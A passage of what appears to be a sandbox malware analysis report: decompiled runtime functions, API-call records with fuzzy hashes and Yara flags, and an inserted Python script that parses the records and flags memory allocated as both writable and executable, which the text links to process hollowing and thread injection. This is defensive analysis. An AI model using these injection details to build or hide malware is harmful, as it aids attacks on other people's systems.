                                                                    						_t92 =  &(_t92[1]);
                                                                    						__eflags =  *0x406680 - _t88; // 0x20
                                                                    						if(__eflags < 0) {
                                                                    							continue;
                                                                    						}
                                                                    						goto L18;
                                                                    					}
                                                                    					_t88 =  *0x406680; // 0x20
                                                                    					goto L18;
                                                                    				}
                                                                    			}

                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004029f0
                                                                    0x004029f2
                                                                    0x004029f8
                                                                    0x00402a00
                                                                    0x00402a02
                                                                    0x00402a04
                                                                    0x00402a04
                                                                    0x00402a06
                                                                    0x00402a0c
                                                                    0x00402a64
                                                                    0x00402a64
                                                                    0x00402a66
                                                                    0x00402a68
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402a6a
                                                                    0x00402a6a
                                                                    0x00402a6d
                                                                    0x00402a6f
                                                                    0x00402a72
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402a74
                                                                    0x00402a76
                                                                    0x00402a78
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402a7a
                                                                    0x00402a7c
                                                                    0x00402a89
                                                                    0x00402a90
                                                                    0x00402a90
                                                                    0x00402a9d
                                                                    0x00402aa5
                                                                    0x00402aa9
                                                                    0x00000000
                                                                    0x00402aa9
                                                                    0x00402a7f
                                                                    0x00402a85
                                                                    0x00402a87
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402aac
                                                                    0x00402aac
                                                                    0x00402ab0
                                                                    0x00402ab1
                                                                    0x00402ab2
                                                                    0x00402ab2
                                                                    0x00000000
                                                                    0x00402a0e
                                                                    0x00402a0e
                                                                    0x00402a13
                                                                    0x00402a18
                                                                    0x00402a1d
                                                                    0x00402a20
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402a22
                                                                    0x00402a22
                                                                    0x00402a29
                                                                    0x00402a2b
                                                                    0x00402a2b
                                                                    0x00402a31
                                                                    0x00402a31
                                                                    0x00402a33
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402a35
                                                                    0x00402a39
                                                                    0x00402a3c
                                                                    0x00402a40
                                                                    0x00402a46
                                                                    0x00402a49
                                                                    0x00402a49
                                                                    0x00402a51
                                                                    0x00402a54
                                                                    0x00402a5a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402a5c
                                                                    0x00402a5e
                                                                    0x00000000
                                                                    0x00402a5e

                                                                    APIs
                                                                    • GetStartupInfoA.KERNEL32(?), ref: 004029D4
                                                                    • GetFileType.KERNEL32(?,?,00000000), ref: 00402A7F
                                                                    • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 00402AE2
                                                                    • GetFileType.KERNEL32(00000000,?,00000000), ref: 00402AF0
                                                                    • SetHandleCount.KERNEL32 ref: 00402B27
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp
                                                                    Similarity
                                                                    • API ID: FileHandleType$CountInfoStartup
                                                                    • String ID:
                                                                    • API String ID: 1710529072-0
                                                                    • Opcode ID: 2ab278c6df39cfa03bb7060241e7dce04149781c205c4e6934a59e1546028741
                                                                    • Instruction ID: 924ec46a1f264d2b59b773f44d255a2275d2ec36f82d1fb601945084d9d20eca
                                                                    • Opcode Fuzzy Hash: 2ab278c6df39cfa03bb7060241e7dce04149781c205c4e6934a59e1546028741
                                                                    • Instruction Fuzzy Hash: CA51F8316006018FD720CF28CA8C7267BE4EB11728F254A7ED996F73D1DBB89905CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00402B99() {
                                                                    				void _t10;
                                                                    				long _t15;
                                                                    				void* _t16;
                                                                    
                                                                    				_t15 = GetLastError();
                                                                    				_t16 = TlsGetValue( *0x4060d4);
                                                                    				if(_t16 == 0) {
                                                                    					_t16 = E00403505(1, 0x74);
                                                                    					if(_t16 == 0 || TlsSetValue( *0x4060d4, _t16) == 0) {
                                                                    						E00402161(0x10);
                                                                    					} else {
                                                                    						E00402B86(_t16);
                                                                    						_t10 = GetCurrentThreadId();
                                                                    						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
                                                                    						 *_t16 = _t10;
                                                                    					}
                                                                    				}
                                                                    				SetLastError(_t15);
                                                                    				return _t16;
                                                                    			}

                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,00000000,004022D5,00000000,?,?,?,00402153,?,?,00000000,00000000), ref: 00402B9B
                                                                    • TlsGetValue.KERNEL32(?,00000000,004022D5,00000000,?,?,?,00402153,?,?,00000000,00000000), ref: 00402BA9
                                                                    • SetLastError.KERNEL32(00000000,?,00000000,004022D5,00000000,?,?,?,00402153,?,?,00000000,00000000), ref: 00402BF5
                                                                      • Part of subcall function 00403505: HeapAlloc.KERNEL32(00000008,?,?,?,?,00402B51,00000001,00000074,?,004020CA), ref: 0040355A
                                                                    • TlsSetValue.KERNEL32(00000000,?,00000000,004022D5,00000000,?,?,?,00402153,?,?,00000000,00000000), ref: 00402BCD
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00402BDE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp
                                                                    Similarity
                                                                    • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                    • String ID:
                                                                    • API String ID: 2020098873-0
                                                                    • Opcode ID: cc3e25ad3ce2f358bdf0e483270c17539a3a2f4085fff9516ff4ab5a6b048679
                                                                    • Instruction ID: 905b2bb4ec102b659b3e470b6a75c60645c1930495211033dcab0bdd225433dd
                                                                    • Opcode Fuzzy Hash: cc3e25ad3ce2f358bdf0e483270c17539a3a2f4085fff9516ff4ab5a6b048679
                                                                    • Instruction Fuzzy Hash: 44F062316016215BD6212F30AE0DA1F3F64EB01761711063AFB45B92E1CB7898019A98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00402F98(void* __eax) {
                                                                    				void* _t1;
                                                                    
                                                                    				_t1 = __eax;
                                                                    				InitializeCriticalSection( *0x4061c4);
                                                                    				InitializeCriticalSection( *0x4061b4);
                                                                    				InitializeCriticalSection( *0x4061a4);
                                                                    				InitializeCriticalSection( *0x406184);
                                                                    				return _t1;
                                                                    			}

                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(?,00402B38,?,004020CA), ref: 00402FA5
                                                                    • InitializeCriticalSection.KERNEL32(?,00402B38,?,004020CA), ref: 00402FAD
                                                                    • InitializeCriticalSection.KERNEL32(?,00402B38,?,004020CA), ref: 00402FB5
                                                                    • InitializeCriticalSection.KERNEL32(?,00402B38,?,004020CA), ref: 00402FBD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp
                                                                    Similarity
                                                                    • API ID: CriticalInitializeSection
                                                                    • String ID:
                                                                    • API String ID: 32694325-0
                                                                    • Opcode ID: 4fded63293943bebae6f0f0b3973d3d43efaa6ddd02f4602d4fa5c2f060bab93
                                                                    • Instruction ID: 26236dc63c9330130dff9c07ffb8b2b085cb36797589e533e36efaee3c3c2e08
                                                                    • Opcode Fuzzy Hash: 4fded63293943bebae6f0f0b3973d3d43efaa6ddd02f4602d4fa5c2f060bab93
                                                                    • Instruction Fuzzy Hash: 59C00231815038AFCE122B65FF1A84A3FA6EB042A03060072A50A7A0368A721C30EFD8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Executed Functions

                                                                    APIs
                                                                    • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID: !:A$b=A$b=A
                                                                    • API String ID: 2738559852-704622139
                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                    • Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                    • Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID: 6HCU
                                                                    • API String ID: 2167126740-1255677348
                                                                    • Opcode ID: a201d11073bd5dc7628d926a61bbc76284421643bd7734e75ee832c2f14c850b
                                                                    • Instruction ID: 785ee6bdb1737b7ece5f68c773e4035cb9a370b06d5a2f4bb549206f88432f0d
                                                                    • Opcode Fuzzy Hash: a201d11073bd5dc7628d926a61bbc76284421643bd7734e75ee832c2f14c850b
                                                                    • Instruction Fuzzy Hash: 4DF0F8B5200208ABCB14DF99DC81EEB77A9AF8C754F158149BE5897251D630E911CBE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                    • Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                    • Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
• API String ID: 823142352-0
• Opcode ID: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
• Instruction ID: eb2fcad7cfbb8d36c8c07e65e7b1c2717ee67fb2c70223fbf7d83cf3cf0a7d26
• Opcode Fuzzy Hash: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
• Instruction Fuzzy Hash: 62F0F8B2218148AF8B44CF9CDD94CEB77ADEB8C210B14465CFA5CC7205C635E8028B64
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
Memory Dump Source
• Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
• Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4
Uniqueness
Uniqueness Score: -1.00%
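
The NtAllocateVirtualMemory record above carries the flag pair 00003000, 00000040, that is MEM_COMMIT|MEM_RESERVE with PAGE_EXECUTE_READWRITE: the unpacked code asks for memory that is writable and executable at the same time, which is consistent with the process-hollowing and thread-injection signatures in the summary. The Python below is an added example, not part of the Joe Sandbox report or of its tooling. It parses records in the layout this page uses, extracts the API call, call-site address, Yara flag and fuzzy hashes per record, and decodes the allocation flags so RWX requests can be listed. SAMPLE is an abridged copy of the two records on this page; the MEM_* and PAGE_* constants are from the Windows SDK. Because the printed argument list is longer than the function's six formal parameters, the code locates the AllocationType/Protect pair by shape (first adjacent valid MEM_* mask and PAGE_* value); that positioning is an assumption, not documented report layout.

```python
"""Parse Joe Sandbox function records (the 'APIs / Memory Dump Source /
Similarity / Uniqueness' blocks on this page) and decode the flag
arguments of NtAllocateVirtualMemory calls.

Added example, not part of the original report.  SAMPLE is an abridged
copy of two records from the page; MEM_*/PAGE_* values are the Windows
SDK constants.  Locating the AllocationType/Protect pair by shape is an
assumption (the printed list is longer than the six formal parameters)."""
import re
from dataclasses import dataclass, field

MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
             0x100000: "MEM_TOP_DOWN", 0x400000: "MEM_PHYSICAL", 0x20000000: "MEM_LARGE_PAGES"}
ALL_MEM = sum(MEM_FLAGS)
PAGE_PROT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
EXEC_PROT = {0x10, 0x20, 0x40, 0x80}
WRITE_PROT = {0x04, 0x08, 0x40, 0x80}

API_RE = re.compile(r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"(?P<key>[^:]+):\s*(?P<val>.*)$")

# Abridged copy of two records from this page (constructed test input).
SAMPLE = """\
APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
Memory Dump Source
• Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
Memory Dump Source
• Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Close
• Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0
Uniqueness
Uniqueness Score: -1.00%
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: list   # raw values as printed; '?' where the sandbox could not resolve one
    ref: int     # call-site address


@dataclass
class FuncRecord:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)
    yara: bool = False


def parse_records(text):
    """Split the text into records; a 'Uniqueness Score' line closes each one."""
    records, cur, section = [], FuncRecord(), None
    for raw in text.splitlines():
        stripped = raw.strip()
        if not stripped:
            continue
        is_bullet = stripped.startswith("•")
        line = stripped.lstrip("•").strip()
        if line.startswith("Uniqueness Score:"):
            cur.fields["Uniqueness Score"] = line.split(":", 1)[1].strip()
            records.append(cur)
            cur, section = FuncRecord(), None
        elif not is_bullet:                      # section header
            section = line
            cur.yara |= line == "Yara matches"
        elif section == "APIs" and (m := API_RE.match(line)):
            cur.apis.append(ApiCall(m["name"], m["module"],
                                    [a.strip() for a in m["args"].split(",")],
                                    int(m["ref"], 16)))
        elif m := KV_RE.match(line):             # 'Key: value' bullet
            cur.fields[m["key"].strip()] = m["val"].strip()
    if cur.apis or cur.fields:                   # trailing record without a score line
        records.append(cur)
    return records


def decode_alloc(call):
    """Decode AllocationType/Protect of an NtAllocateVirtualMemory call.
    Assumption: the first adjacent (valid MEM_* mask, valid PAGE_* value) pair is it."""
    vals = [int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]+", a) else None for a in call.args]
    for alloc, prot in zip(vals, vals[1:]):
        if alloc and prot and (alloc & ~ALL_MEM) == 0 and prot in PAGE_PROT:
            return {"allocation_type": [n for b, n in MEM_FLAGS.items() if alloc & b],
                    "protect": PAGE_PROT[prot],
                    "executable": prot in EXEC_PROT,
                    "writable": prot in WRITE_PROT}
    return None


def rwx_allocations(records):
    """Call sites that request memory both writable and executable."""
    hits = []
    for rec in records:
        for call in rec.apis:
            if call.name == "NtAllocateVirtualMemory":
                d = decode_alloc(call)
                if d and d["executable"] and d["writable"]:
                    hits.append((f"0x{call.ref:08X}", d))
    return hits


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rec in recs:
        for call in rec.apis:
            print(f"{call.ref:08X} {call.module}!{call.name} yara={rec.yara} "
                  f"ifh={rec.fields.get('Instruction Fuzzy Hash', '')[:16]}...")
    for ref, d in rwx_allocations(recs):
        print(ref, "|".join(d["allocation_type"]), d["protect"])
```

Run it over the full text of this section (every record between an "APIs" header and its "Uniqueness Score" line) to get one row per function with its call-site address and Instruction Fuzzy Hash, and a separate list of the RWX allocation sites; the fuzzy hashes can then be compared across samples without re-running the sandbox.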

                                                                    APIs
                                                                    • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                    • Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                    • Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 2fb3d2c1dc573ce84b81882f7ead5dd4d112b844fa127f3e519557d0e5f8cd93
                                                                    • Instruction ID: 68577cacf03e93670ad29c050c5fdd55d226c7789325752fb55606666364c01f
                                                                    • Opcode Fuzzy Hash: 2fb3d2c1dc573ce84b81882f7ead5dd4d112b844fa127f3e519557d0e5f8cd93
                                                                    • Instruction Fuzzy Hash: 1190027120108812D2106569840474A000597D1351F95C421A482479CD8BD58891B161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8115cae4f2fc3fa34757934cd833c383d81e6c58f317df686f1a61672ea427d8
                                                                    • Instruction ID: a15b8af47e4efb8ea668a3f14418aa5d9a1d2b6886b025e5208f5892d88a5080
                                                                    • Opcode Fuzzy Hash: 8115cae4f2fc3fa34757934cd833c383d81e6c58f317df686f1a61672ea427d8
                                                                    • Instruction Fuzzy Hash: F890026160100512D20175694404616000A97D1391FD1C032A1424699ECF658992F171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: ce3f4df23be8fde40d979cbdefcecede6a00ec788d2ce776c29b7cf371fa23c9
                                                                    • Instruction ID: 7c054a974e3105e83e9f5644a268685edbb76e4286ea4597864701f4beaa2fd0
                                                                    • Opcode Fuzzy Hash: ce3f4df23be8fde40d979cbdefcecede6a00ec788d2ce776c29b7cf371fa23c9
                                                                    • Instruction Fuzzy Hash: E0900261601000524240757988449064005BBE2361791C131A0D98694D8B998865A6A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0acd7c6dc2370abcb92788717fcf4619d0c55782036128b0f43b8cfd6b80d032
                                                                    • Instruction ID: 0235c36ea7bdcdbc24841a5a9b88e092e6e731b5e84bb4efd8ed8fed32cf97c0
                                                                    • Opcode Fuzzy Hash: 0acd7c6dc2370abcb92788717fcf4619d0c55782036128b0f43b8cfd6b80d032
                                                                    • Instruction Fuzzy Hash: D690027120140412D2006569481470B000597D1352F91C021A1564699D8B658851B5B1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: c3fbae32eeb71227ccd9fca3cff944c3166f5b60fb68fbe90789eea645c24a0e
                                                                    • Instruction ID: f4bd54b5bf831bbc9e69f1551ac1406b83f441b015e97b511b1de3e2849c4bf0
                                                                    • Opcode Fuzzy Hash: c3fbae32eeb71227ccd9fca3cff944c3166f5b60fb68fbe90789eea645c24a0e
                                                                    • Instruction Fuzzy Hash: 0D90027120100423D21165694504707000997D1391FD1C422A082469CD9B968952F161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 6cadbd5e4272190adbfbf2af08db6f58ca292d3bf5c399c5ef898344e78f155f
                                                                    • Instruction ID: f4b46b39021c9b4c7c1a5a49f2c3a136c92a869598acb371458f492dbf23ec86
                                                                    • Opcode Fuzzy Hash: 6cadbd5e4272190adbfbf2af08db6f58ca292d3bf5c399c5ef898344e78f155f
                                                                    • Instruction Fuzzy Hash: CA90027120100812D2807569440464A000597D2351FD1C025A0425798DCF558A59B7E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 7576b971790bf13512522a234de5469697e74cb65f592d3528a3b5a0e7fe3d8c
                                                                    • Instruction ID: 1e479c74a930dbb7ea33a03ed207d21741d401c53c4c0977dc14dbd2bbe76a09
                                                                    • Opcode Fuzzy Hash: 7576b971790bf13512522a234de5469697e74cb65f592d3528a3b5a0e7fe3d8c
                                                                    • Instruction Fuzzy Hash: 72900261242041625645B56944045074006A7E13917D1C022A1814A94C8B669856E661
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 596357a39836952033d1b746f944710ed6ce02a0f1c9530f61c2b73113b3752e
                                                                    • Instruction ID: cb008b70dde0232e8d6226cbbb86638acafec2c16bb9ff353fbac24b37e8939e
                                                                    • Opcode Fuzzy Hash: 596357a39836952033d1b746f944710ed6ce02a0f1c9530f61c2b73113b3752e
                                                                    • Instruction Fuzzy Hash: 3A90026121180052D30069794C14B07000597D1353F91C125A0554698CCF558861A561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 209cc308ffe874406d7647d095db9f7a237dc110956bb9a8a98eb28d14db2233
                                                                    • Instruction ID: d832ba77576803b6286238bc09bbe404ad308535eb4c9bb62c3b66c6f020faa0
                                                                    • Opcode Fuzzy Hash: 209cc308ffe874406d7647d095db9f7a237dc110956bb9a8a98eb28d14db2233
                                                                    • Instruction Fuzzy Hash: D390026130100013D240756954186064005E7E2351F91D021E0814698CDF558856A262
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 040b4a96a6718cee8770d174008de474ea504b3adf4dde51d7060110f8ec40fa
                                                                    • Instruction ID: a7e5dc4759d1625ba41805ec83abb50d7edd9eb1735cf4a6fa62cbbdafbff437
                                                                    • Opcode Fuzzy Hash: 040b4a96a6718cee8770d174008de474ea504b3adf4dde51d7060110f8ec40fa
                                                                    • Instruction Fuzzy Hash: F89002A134100452D20065694414B060005D7E2351F91C025E1464698D8B59CC52B166
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0319febce1b238bccee2e870a966cb1e47385c5509105cba465d9ad6f2fb45e7
                                                                    • Instruction ID: 36d071a959a6f0a111c576ec08f9d029a47a7c11d6cb807275366bd40099b6e0
                                                                    • Opcode Fuzzy Hash: 0319febce1b238bccee2e870a966cb1e47385c5509105cba465d9ad6f2fb45e7
